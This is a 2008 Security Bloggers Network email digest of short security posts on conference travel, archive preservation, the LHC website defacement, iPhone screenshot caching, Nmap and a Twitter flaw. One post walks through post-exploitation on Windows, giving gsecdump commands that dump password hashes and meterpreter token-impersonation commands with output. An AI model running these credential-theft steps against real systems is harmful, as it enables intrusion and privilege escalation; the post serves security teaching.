Spliced feed for Security Bloggers Network |
Bypassing ASP.NET “ValidateRequest” for Script Injection Attacks [Security Circus] Posted: 14 Sep 2008 04:05 AM CDT |
Travel: Off to VMworld 2008 in Vegas [Rational Survivability] Posted: 13 Sep 2008 06:54 PM CDT
I'm looking forward to meeting with fellow practitioners, analysts, folks from VMware, Microsoft, Citrix and vendors as well as attending many of the sessions and labs. There are several meet-ups including community get-togethers, so if you're in town, ping me and let's get together and exchange ideas. There's a bunch of anticipated high-profile announcements and I hope some of them pan out. I'll be live-blogging/tweeting (beaker) as much as possible from the show. See you there. /Hoff |
Losing our History [Security For All] Posted: 13 Sep 2008 04:01 PM CDT My wife and I spent the Independence Day weekend this year in Washington DC. In addition to watching the fireworks from the base of the Iwo Jima memorial we visited a number of other memorials and museums. But probably the most amazing place we visited was the National Archives. Aside from the U.S. Constitution and Declaration of Independence, the National Archives is in fact an archive of the U.S. government’s correspondent, business and legal transactions some of which are on exhibit. These exhibits include excerpts from the infamous Nixon Watergate tapes to (my person favorite) a letter from a 10-year-old Fidel Castro to President Franklin D. Roosevelt dated November 6, 1940, asking for a “ten dollar bill green American” (maybe Roosevelt should have sent him the 10 bucks - you never know). The fact is that the National Archive is a repository of everything the U.S. Government is involved in. Everything. The good, the bad, the ugly. The greatest achievements, the finest moments and the things we would like to forget. Especially the things we’d like to forget. This is everything from the most visible, substantial and important documents like the U.S. Constitution to mundane interoffice correspondence, which can in the long run be just as important historically. You might think that the digital age has made the job of the National Archives quite a bit easier. Unfortunately nothing could be further from the truth as this article from the New York Times points out.
While those conspiracy theory fans among us (okay, I admit it - but the truth is out there) prefer a more tantalizing threat like a shadowy cabal that secretly removes and suppresses information embarrassing or threatening to their members, the reality is much more mundane - and insidious. And it’s a whole lot harder to address.
That’s right - it’s those pesky end users. You know, those regular folks who are just trying to get their job done as efficiently as possible. Yeah, those people who we never have the time or budget to provide with decent hardware and software. And forget about education (no money for that in this year’s budget). Oh, and the folks who actually control the purse strings don’t have “keep a public record of the stupid things we do” at the top of their must-fund list. (Yes! I knew I could slide a conspiracy theory in there). All this is really patriotic, and sufficiently alarmist to get some good hits on Google, but what does it have to do with security, Mr. Security For All? Actually - everything. Remember the CIA triad: Confidentiality, Integrity and Availability. This issue is fundamental to both Integrity and Availability. From Wikipedia:
I think we can all agree that not saving important information through neglect is the same thing as deleting important data. And when future generations - or a researcher today - can’t get access to an email that is germane to their research because it was never saved violates availability. So how do we go about mitigating this threat? There is already a program in progress to bring the National Archives more fully into the 21st century, but it is not without it’s all too typical problems.
As a point of reference 32 million White House e-mail messages were preserved as records of the Clinton administration. The National Archives expects to receive hundreds of millions from the Bush White House. And since disputes over White House records have occurred at the end of the last three administrations, we can count on more litigation in January. So here’s a bold idea: why not take the money that will be flushed down the litigation rat hole and put it towards the electronic record-keeping system? Oh, but wait, that would mean that politicians would have to be subject to the same laws, standards and directives that all government employees are. Or maybe Lockheed Martin could get some help from the IBM Almaden research guys on storing, indexing and accessing insane amounts of information since the Webfountain project went dark. Or underground. (Yes! another conspiracy theory reference). In any case this is a risk that must be managed - and soon - before we lose what amounts to our civic cultural heritage. |
SFO Network Administrator Debacle Still Evident [Infosecurity.US] Posted: 13 Sep 2008 01:53 PM CDT NetworkWorld’s Robert McMillan reports issues revolving around, and from, the dispute between the City of San Francisco and it’s former network administrator - Terry Childs - (now rogue, and incarcerated) are still evident.
[1] NetworkWorld: San Francisco Hunts For Mystery Device On City Network |
Have an iPhone? All Use Captured In Screenshots. Automagically. [Infosecurity.US] Posted: 13 Sep 2008 01:48 PM CDT Wired’s GadgetLab blogger Brian X. Chen reports a new (and a potential windfall for forensic research) functionality of Apple’s (NasdaqGS: APPL) iPhone smartphone. Evidently, during a blogcast, forensics specialist Jonathan Zdziarski divulged the capability of the device to cache a copy of the latest screen activity. Apparently, this functionality is intended for the purpose of supporting the aesthetics of the product. From the post: “…This is purely for aesthetic purposes: When an iPhone user taps the Home button, the window of the application you have open shrinks and disappears. In order to create that shrinking effect, the iPhone snaps a screenshot, Zdziarski said…” |
Criminals Attack Large Hadron Collider Website [Infosecurity.US] Posted: 13 Sep 2008 01:38 PM CDT
The Telegraph UK’s, Roger Highfield [Science Editor] reports criminal hackers, apparently based in Greece, have defaced the Large Hadron Collider website in Switzerland. Scientists at CERN also speculated on the possibility of the hack attempts leading to a shutdown of the facility.
|
12th IACR International Workshop on Practice and Theory in Public Key Cryptography [Infosecurity.US] Posted: 13 Sep 2008 12:44 PM CDT The IACR has issued a call for papers for the 12th IACR International Workshop on Practice & Theory in Public Key Cryptography 2009. (Note: Infosecurity.US is a member of the IACR). The full Call for Papers Notification appears after the jump.
|
US-CERT: Reports of DHS Email Spam [Infosecurity.US] Posted: 13 Sep 2008 12:43 PM CDT US-CERT has released a notification specifying a new spam attack using Department of Homeland Security addresses.
|
Playing with Live Streams for SRT [Network Security Blog] Posted: 13 Sep 2008 08:07 AM CDT This morning Michael Santarcangelo and I will be playing with streaming the audio from an Security Roundtable podcast. We don’t really have a topic or a theme for the podcast. We don’t even have any stories to talk about. We’ll just be sitting online, talking and testing out how to use the streaming software. And let me tell you, this software has more options and tricks than I’ll use in a long, long time. The stream will start at 7:00 am PDT at http://hak5radio.com:8000/SRT.mp3.m3u I think. I may have the URL munged up a little, so if that doesn’t work, try it with just the .mp3 extension. We have a guest lined up thanks to a tweet last night, but this really is just going to be 3 security guys talking about whatever interests them for about 45 minutes. If this works out, Rich and I may try streaming the Network Security Podcast when we record. We can’t do anything as organized as actually have a set time and date for our recording sessions, but this will be one step closer to being able to do so. PS. I created a channel for today’s session on IRC.freenode.net. Predictably, the channel name is ##SRT. |
Hackers attack Large Hadron Collider [Security Circus] Posted: 13 Sep 2008 08:00 AM CDT |
United 'bankruptcy' points to new stock scam techniques [Security Circus] Posted: 13 Sep 2008 07:57 AM CDT |
Large Hadron Collider - LHC Livecam [Security Circus] Posted: 13 Sep 2008 07:50 AM CDT |
"Apple views tennis-shoe DRM as a way to head off what it sees as a potential ..." [Security Circus] Posted: 13 Sep 2008 07:24 AM CDT Apple views tennis-shoe DRM as a way to head off what it sees as a potential plague of sneaker hacking. "Some people," the patent application observes, "have taken it upon themselves to remove the sensor from the special pocket of the [iPod-linked] Nike+ shoe and place it at inappropriate locations (shoelaces, for example) or place it on non-Nike+ model shoes." Oh my God: Geeks are ripping the sensors out of their sneakers and sticking them on their shoelaces! Unleash the shoe nazis! It used to be cool to be an Apple fanboy. Now it's starting to be embarrassing. –Apple declares war on sneaker hackers |
International Data Privacy Laws by Country [Security Circus] Posted: 13 Sep 2008 04:26 AM CDT |
UCSB Security Group's Attack on Voting Machines (Part 2 of 2) [Security Circus] Posted: 13 Sep 2008 04:24 AM CDT |
UCSB Security Group's Attack on Voting Machines (Part 1 of 2) [Security Circus] Posted: 13 Sep 2008 04:24 AM CDT |
Posted: 13 Sep 2008 04:13 AM CDT |
via ThreatExpert [Security Circus] Posted: 13 Sep 2008 04:08 AM CDT via ThreatExpert This posting includes an audio/video/photo media file: Download Now |
"Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlus..." [Security Circus] Posted: 13 Sep 2008 04:02 AM CDT Sabina Guzzanti, known for her take-offs of the prime minister, Silvio Berlusconi, risks being jailed for up to five years. The prosecutors recommended to the justice ministry that she be indicted because of a speech she made to a leftwing rally in July. Referring to the attitude to gay people of the Catholic church and Pope Benedict - the former cardinal Joseph Ratzinger - Guzzanti said: "In 20 years Ratzinger will be dead and will end up in hell, tormented by queer demons - not passive ones, but very active ones." –Comedian who satirised Pope could face prosecution | World news | The Guardian Reposted from sid77 |
Posted: 13 Sep 2008 04:00 AM CDT |
Posted: 13 Sep 2008 04:00 AM CDT |
Posted: 13 Sep 2008 03:58 AM CDT |
passing the hash with gsecdump and msvctl (yes more) [Carnal0wnage Blog] Posted: 12 Sep 2008 08:59 PM CDT So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop. For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here). "Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info." OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users. example: #popped a system shell and got a command shell with meterpreter C:\Documents and Settings\nobody\Desktop>gsecdump -u gsecdump -u MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: #logged into the box as nobody C:\Documents and Settings\nobody\Desktop>gsecdump -u gsecdump -u XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Logged out as nobody C:\Documents and Settings\nobody\Desktop>gsecdump -u gsecdump -u MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens. Let's see the same scenario with incognito meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON #login as nobody meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM XPSP1VM\nobody Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON #log out as nobody meterpreter > list_tokens -u Delegation Tokens Available ======================================== NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON XPSP1VM\nobody meterpreter > impersonate_token XPSP1VM\\nobody [-] No delegation token available [+] Successfully impersonated user XPSP1VM\nobody meterpreter > getuid Server username: XPSP1VM\nobody meterpreter > rev2self meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead. Some other reading on gsecdump and msvctl http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20 http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold. http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx best quote: "Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about." I don't know, going from a local admin on a box to domain admin is pretty interesting to me... |
Book Review: Understanding UNIX/Linux Programming [Reflections on Security] Posted: 12 Sep 2008 07:59 PM CDT I've posted a review of Understanding UNIX/LINUX Programming: A Guide to Theory and Practice by Bruce Molay on Amazon. While not a security topic per se, a solid grounding in systems programming is a prerequisite for vulnerability researchers and other technically oriented security professionals. Arguably, there is no better introduction to the subject than this book. |
Book Review: Against The Gods - The Remarkable Story Of Risk [Reflections on Security] Posted: 12 Sep 2008 07:42 PM CDT To many practitioners, information security is a form of risk management. Since it is impossible to protect a complex system against all conceivable security threats, an approach based on the assessment of risk is employed to distinguish between the threats that are worth worrying about and those that aren't. But what exactly does the concept of risk represent? How does one measure (never mind control) risk? This is an age-old problem mankind has been struggling with for centuries. |
DNI Open Source Conference 2008 - Remarks From CIA Director [Infosecurity.US] Posted: 12 Sep 2008 05:55 PM CDT The Office of the Director of National Intelligence (ODNI) has released the following transcript, detailing the remarks and question & answer session during Day 2 (yesterday, September 12th, 2008) ODNI Open Source Conference in Washington, D.C. Without further ado, we are publishing this fascinating transcript after the break.
|
Nmap 4.75 Released [Infosecurity.US] Posted: 12 Sep 2008 03:54 PM CDT Insecure.org has announced the release Nmap 4.75, with nearly 100 significant enhancements from version 4.68. Certainly, one compelling reason to upgrade from a previous version is the applications ability to graphically map network topologies.
|
Another Twitter Vulnerability [Infosecurity.US] Posted: 12 Sep 2008 03:23 PM CDT DARKNET posts in a follow-on (no pun intended) report, of yet another Twitter vulnerability; this time a CSRF (Cross Site Response Forgery) vulnerability which apparently permits forced following.
|
You are subscribed to email updates from Security Bloggers Network To stop receiving these emails, you may unsubscribe now. | Email Delivery powered by FeedBurner |
Inbox too full? Subscribe to the feed version of Security Bloggers Network in a feed reader. | |
If you prefer to unsubscribe via postal mail, write to: Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610 |
No comments:
Post a Comment